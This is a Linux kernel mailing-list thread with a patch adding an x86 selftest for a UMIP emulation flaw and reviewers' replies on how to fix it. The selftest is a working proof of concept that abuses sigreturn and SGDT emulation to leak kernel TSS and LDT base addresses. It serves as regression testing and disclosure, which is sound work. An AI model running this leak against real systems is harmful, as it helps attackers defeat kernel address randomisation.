* [PATCH 2/2] selftests/x86: UMIP DPL=0 segment base address info leak test
2023-12-06 0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
2023-12-06 0:43 ` [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0) Michal Luczaj
@ 2023-12-06 0:43 ` Michal Luczaj
2023-12-09 15:53 ` [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Borislav Petkov
2023-12-09 17:16 ` Brian Gerst
3 siblings, 0 replies; 7+ messages in thread
From: Michal Luczaj @ 2023-12-06 0:43 UTC (permalink / raw)
To: x86
Cc: tglx, mingo, bp, dave.hansen, shuah, luto, torvalds,
linux-kernel, Michal Luczaj
Test for UMIP-related opcode emulation revealing the base address of
DPL=0 segments.
Suggested-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Michal Luczaj <mhal@rbox.co>
---
I understand that code quoted in comments tend to bit rot badly. Feel free
to chop it off.
tools/testing/selftests/x86/Makefile | 6 +-
tools/testing/selftests/x86/umip_leak_seg.c | 249 ++++++++++++++++++++
2 files changed, 254 insertions(+), 1 deletion(-)
create mode 100644 tools/testing/selftests/x86/umip_leak_seg.c
diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0b872c0a42d2..262cda802c87 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -19,7 +19,8 @@ TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
test_FCMOV test_FCOMI test_FISTTP \
vdso_restorer
TARGETS_C_64BIT_ONLY := fsgsbase sysret_rip syscall_numbering \
- corrupt_xstate_header amx lam test_shadow_stack
+ corrupt_xstate_header amx lam test_shadow_stack \
+ umip_leak_seg
# Some selftests require 32bit support enabled also on 64bit systems
TARGETS_C_32BIT_NEEDED := ldt_gdt ptrace_syscall
@@ -113,3 +114,6 @@ $(OUTPUT)/check_initial_reg_state_64: CFLAGS += -Wl,-ereal_start -static
$(OUTPUT)/nx_stack_32: CFLAGS += -Wl,-z,noexecstack
$(OUTPUT)/nx_stack_64: CFLAGS += -Wl,-z,noexecstack
+
+# umip_leak_seg expects the first 4GiB of address space to be non-writable
+$(OUTPUT)/umip_leak_seg_64: CFLAGS += -pie -fPIE -Wl,-Ttext-segment=0x100000000
diff --git a/tools/testing/selftests/x86/umip_leak_seg.c b/tools/testing/selftests/x86/umip_leak_seg.c
new file mode 100644
index 000000000000..422d63c0ac50
--- /dev/null
+++ b/tools/testing/selftests/x86/umip_leak_seg.c
@@ -0,0 +1,249 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * umip_leak_seg.c - Test for user space retrieving a DPL=0 segment base
+ * address via UMIP instruction decoding/emulation.
+ *
+ * User space executing opcode SGDT on a UMIP-enabled CPU results in
+ * #GP(0). In an effort to support legacy applications, #GP handler calls
+ * fixup_umip_exception() to patch up the exception and return a dummy
+ * value.
+ *
+ * SGDT is emulated by decoding the instruction and copying dummy data to
+ * the memory address specified by the operand:
+ *
+ * uaddr = insn_get_addr_ref(&insn, regs);
+ * if ((unsigned long)uaddr == -1L)
+ * return false;
+ *
+ * nr_copied = copy_to_user(uaddr, dummy_data, dummy_data_size);
+ * if (nr_copied > 0) {
+ * / *
+ * * If copy fails, send a signal and tell caller that
+ * * fault was fixed up.
+ * * /
+ * force_sig_info_umip_fault(uaddr, regs);
+ * return true;
+ * }
+ *
+ * Decoder handles segmentation, so for "sgdt %ss:(%rax)" the value of
+ * `uaddr` will be correctly (in compatibility mode) shifted by the base
+ * address of the segment. There's a catch though: decoder does not check
+ * segment's DPL, nor its type.
+ *
+ * ptrace() can be used to prepare a RPL=3 selector for a S=0/DPL=0
+ * segment, potentially one with a kernel space base address. On return to
+ * user space, CPU will reject such selector load; exception will be
+ * raised. But because the #GP handler sees no distinction between
+ * SGDT-induced #GP(0) and IRET-induced #GP(selector), emulator will kick
+ * in and process the malformed @regs->ss.
+ *
+ * If the first 4 GiB of user space are unmapped or non-writable,
+ * copy_to_user() will fail, and signal to user will reveal `uaddr` -- i.e.
+ * the (part of) kernel address. On x86_64, addresses of GDT_ENTRY_TSS (for
+ * each CPU) and GDT_ENTRY_LDT (when in use) can be fully leaked in a few
+ * steps.
+ *
+ * This selftest makes sure that selectors belonging to kernel are not
+ * passed to UMIP emulation logic on #GP. CPU#0's TSS and the current
+ * task's LDT are tried for that. Code is compiled with
+ * -Ttext-segment=0x100000000 to reserve the initial 4 GiB, so that
+ * SIGSEGV's siginfo_t::si_addr can be reliably caught. As an alternative
+ * to ptrace(), sigreturn() is used for setting illegal selector value.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <signal.h>
+#include <setjmp.h>
+#include <assert.h>
+#include <sched.h>
+#include <errno.h>
+#include <err.h>
+
+#include <sys/syscall.h>
+#include <sys/user.h>
+#include <asm/ldt.h>
+
+/* grep arch/x86/include/asm/segment.h */
+#define GDT_ENTRY_DEFAULT_USER32_CS 4
+#define GDT_ENTRY_TSS 8
+#define GDT_ENTRY_LDT 10
+
+#define USER_RPL 3
+
+static int umip_leak_seg;
+static int umip_leak_ax;
+static long umip_leak_kmem;
+static sigjmp_buf buf;
+
+static __attribute__((naked)) void sgdt(void)
+{
+ asm volatile ("sgdt %ss:(%rax)");
+}
+
+/*
+ * Make sure the first 4 GiB are not mapped.
+ */
+static void check_vm(void)
+{
+ unsigned long start;
+ FILE *f;
+
+ f = fopen("/proc/self/maps", "r");
+ if (!f)
+ err(1, "fopen");
+
+ if (fscanf(f, "%lx-", &start) != 1 || start < (1UL << 32))
+ errx(1, "First 4 GiB need to be unmapped");
+
+ fclose(f);
+}
+
+/*
+ * arch/x86/kernel/ldt.c:
+ * if (alloc_size > PAGE_SIZE)
+ * new_ldt->entries = __vmalloc(alloc_size, GFP_KERNEL_ACCOUNT | __GFP_ZERO);
+ * else
+ * new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
+ */
+static void force_ldt_vmalloc(void)
+{
+ struct user_desc desc = { .entry_number = LDT_ENTRIES - 1 };
+ int ret;
+
+ ret = syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
+ if (ret) {
+ errno = -ret;
+ err(1, "modify_ldt");
+ }
+}
+
+static void set_handler(int sig, void (*handler)(int, siginfo_t *, void *))
+{
+ struct sigaction sa;
+
+ memset(&sa, 0, sizeof(sa));
+
+ sa.sa_sigaction = handler;
+ sa.sa_flags = SA_SIGINFO;
+ sigemptyset(&sa.sa_mask);
+
+ if (sigaction(sig, &sa, 0))
+ err(1, "sigaction");
+}
+
+static void sigusr1(int sig, siginfo_t *info, void *ctx_void)
+{
+ ucontext_t *ctx = (ucontext_t *)ctx_void;
+ struct selectors {
+ unsigned short cs, gs, fs, ss;
+ } *sel = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
+
+ sel->cs = (GDT_ENTRY_DEFAULT_USER32_CS << 3) | USER_RPL;
+ sel->ss = (umip_leak_seg << 3) | USER_RPL;
+ ctx->uc_mcontext.gregs[REG_RAX] = umip_leak_ax;
+ ctx->uc_mcontext.gregs[REG_RIP] = (greg_t)&sgdt;
+}
+
+static void sigsegv(int sig, siginfo_t *info, void *ctx_void)
+{
+ assert((intptr_t)info->si_addr >> 32 == 0);
+
+ if (info->si_code & SI_KERNEL)
+ umip_leak_kmem = -1L;
+ else
+ umip_leak_kmem = (intptr_t)info->si_addr;
+
+ siglongjmp(buf, 1);
+}
+
+static long leak(int seg, int ax)
+{
+ umip_leak_seg = seg;
+ umip_leak_ax = ax;
+
+ if (sigsetjmp(buf, 1))
+ return umip_leak_kmem;
+
+ raise(SIGUSR1);
+ assert(!"unreachable");
+}
+
+static long find_limit(int seg)
+{
+ int limit = 0xffff;
+
+ /* Assuming desc::g and desc::limit1 are zero. */
+ while (limit >= 0 && leak(seg, limit) < 0)
+ limit--;
+
+ return limit;
+}
+
+static int fetch_base(char *seg_name, int seg)
+{
+ long base = leak(seg, 0);
+
+ if (base != -1) {
+ /*
+ * We're aiming here at a long mode segment descriptor that's
+ * taking two legacy-mode-sized entries in the GDT.
+ * Base Address[63:32] of n-th entry will be leaked in two
+ * steps: from Segment Limit[15:0] and Base Address[15:0] of
+ * (n+1)-th entry.
+ */
+ base |= find_limit(seg + 1) << 32;
+ base |= leak(seg + 1, 0) << 48;
+
+ printf("[FAIL]\t%s base leaked: %#zx\n", seg_name, base);
+ return 1;
+ }
+
+ printf("[OK]\t%s base: no leaks\n", seg_name);
+ return 0;
+}
+
+static int dump_TSS(void)
+{
+ cpu_set_t old, new;
+ int ret;
+
+ if (sched_getaffinity(0, sizeof(old), &old))
+ err(1, "sched_getaffinity");
+
+ CPU_ZERO(&new);
+ CPU_SET(0, &new);
+
+ if (sched_setaffinity(0, sizeof(new), &new))
+ err(1, "sched_setaffinity");
+
+ ret = fetch_base("CPU#0 TSS", GDT_ENTRY_TSS);
+
+ if (sched_setaffinity(0, sizeof(old), &old))
+ err(1, "sched_setaffinity restore");
+
+ return ret;
+}
+
+static int dump_LDT(void)
+{
+ force_ldt_vmalloc();
+ return fetch_base("LDT", GDT_ENTRY_LDT);
+}
+
+int main(void)
+{
+ int status;
+
+ check_vm();
+
+ set_handler(SIGUSR1, sigusr1);
+ set_handler(SIGSEGV, sigsegv);
+
+ status = dump_TSS();
+ status |= dump_LDT();
+
+ return status;
+}
--
2.43.0
^ permalink raw reply related [flat|nested] 7+ messages in thread
* Re: [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
2023-12-06 0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
2023-12-06 0:43 ` [PATCH 1/2] x86/traps: Attempt UMIP fixup only on #GP(0) Michal Luczaj
2023-12-06 0:43 ` [PATCH 2/2] selftests/x86: UMIP DPL=0 segment base address info leak test Michal Luczaj
@ 2023-12-09 15:53 ` Borislav Petkov
2023-12-10 17:08 ` Michal Luczaj
2023-12-09 17:16 ` Brian Gerst
3 siblings, 1 reply; 7+ messages in thread
From: Borislav Petkov @ 2023-12-09 15:53 UTC (permalink / raw)
To: Michal Luczaj
Cc: x86, tglx, mingo, dave.hansen, shuah, luto, torvalds, linux-kernel
On Wed, Dec 06, 2023 at 01:43:43AM +0100, Michal Luczaj wrote:
> Introducing a DPL check in insn_get_seg_base(), or even in get_desc(),
> seems enough to prevent the decoder from disclosing data.
>
> diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
> index 558a605929db..4c1eea736519 100644
> --- a/arch/x86/lib/insn-eval.c
> +++ b/arch/x86/lib/insn-eval.c
> @@ -725,6 +725,18 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
> if (!get_desc(&desc, sel))
> return -1L;
>
> + /*
> + * Some segment selectors coming from @regs do not necessarily reflect
> + * the state of CPU; see get_segment_selector(). Their values might
> + * have been altered by ptrace. Thus, the instruction decoder can be
> + * tricked into "dereferencing" a segment descriptor that would
> + * otherwise cause a CPU exception -- for example due to mismatched
> + * privilege levels. This opens up the possibility to expose kernel
> + * space base address of DPL=0 segments.
> + */
> + if (desc.dpl < (regs->cs & SEGMENT_RPL_MASK))
> + return -1L;
> +
> return get_desc_base(&desc);
> }
>
> That said, I guess instead of trying to harden the decoder,
Well, here's what my CPU manual says:
"4.10.1 Accessing Data Segments
...
The processor compares the effective privilege level with the DPL in the
descriptor-table entry referenced by the segment selector. If the
effective privilege level is greater than or equal to (numerically
lower-than or equal-to) the DPL, then the processor loads the segment
register with the data-segment selector.
If the effective privilege level is lower than (numerically
greater-than) the DPL, a general-protection exception (#GP) occurs and
the segment register is not loaded.
...
4.10.2 Accessing Stack Segments
The processor compares the CPL with the DPL in the descriptor-table
entry referenced by the segment selector. The two values must be equal.
If they are not equal, a #GP occurs and the SS register is not loaded."
So *actually* doing those checks in the insn decoder is the proper thing
to do, IMNSVHO.
> Now, I'm far from being competent, but here's an idea I've tried: tell
> the #GP handler that UMIP-related exceptions come only as #GP(0):
>
> if (static_cpu_has(X86_FEATURE_UMIP)) {
> - if (user_mode(regs) && fixup_umip_exception(regs))
> + if (user_mode(regs) && !error_code && fixup_umip_exception(regs))
> goto exit;
> }
And yap, as you've realized, that alone doesn't fix the leaking.
Thx.
--
Regards/Gruss,
Boris.
https://people.kernel.org/tglx/notes-about-netiquette
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: [PATCH 0/2] x86: UMIP emulation leaking kernel addresses
2023-12-06 0:43 [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Michal Luczaj
` (2 preceding siblings ...)
2023-12-09 15:53 ` [PATCH 0/2] x86: UMIP emulation leaking kernel addresses Borislav Petkov
@ 2023-12-09 17:16 ` Brian Gerst
2023-12-09 20:08 ` Linus Torvalds
3 siblings, 1 reply; 7+ messages in thread
From: Brian Gerst @ 2023-12-09 17:16 UTC (permalink / raw)
To: Michal Luczaj
Cc: x86, tglx, mingo, bp, dave.hansen, shuah, luto, torvalds, linux-kernel
On Tue, Dec 5, 2023 at 8:22 PM Michal Luczaj <mhal@rbox.co> wrote:
>
> User space executing opcode SGDT on a UMIP-enabled CPU results in
> #GP(0). In an effort to support legacy applications, #GP handler calls
> fixup_umip_exception() to patch up the exception and return a dummy
> value:
>
> if (static_cpu_has(X86_FEATURE_UMIP)) {
> if (user_mode(regs) && fixup_umip_exception(regs))
> goto exit;
> }
>
> SGDT is emulated by decoding the instruction and copying dummy data to
> the memory address specified by the operand:
>
> uaddr = insn_get_addr_ref(&insn, regs);
> if ((unsigned long)uaddr == -1L)
> return false;
>
> nr_copied = copy_to_user(uaddr, dummy_data, dummy_data_size);
> if (nr_copied > 0) {
> /*
> * If copy fails, send a signal and tell caller that
> * fault was fixed up.
> */
> force_sig_info_umip_fault(uaddr, regs);
> return true;
> }
>
> Decoder handles segmentation, so for "sgdt %ss:(%rax)" the value of
> `uaddr` will be correctly (in compatibility mode) shifted by the base
> address of the segment. There's a catch though: decoder does not check
> segment's DPL, nor its type.
>
> ptrace() can be used to prepare a RPL=3 selector for a S=0/DPL=0
> segment, potentially one with a kernel space base address. On return to
> user space, CPU will reject such selector load; exception will be
> raised. But because the #GP handler sees no distinction between
> SGDT-induced #GP(0) and IRET-induced #GP(selector), emulator will kick
> in and process the malformed @regs->ss.
>
> If the first 4 GiB of user space are unmapped or non-writable,
> copy_to_user() will fail, and signal to user will reveal `uaddr` -- i.e.
> the (part of) kernel address. On x86_64, addresses of GDT_ENTRY_TSS (for
> each CPU) and GDT_ENTRY_LDT (when in use) can be fully leaked in a few
> steps.
A different way to plug this is to harden ptrace (and sigreturn) to
verify that the segments are code or data type segments instead of
relying on an IRET fault.
Brian Gerst
^ permalink raw reply [flat|nested] 7+ messages in thread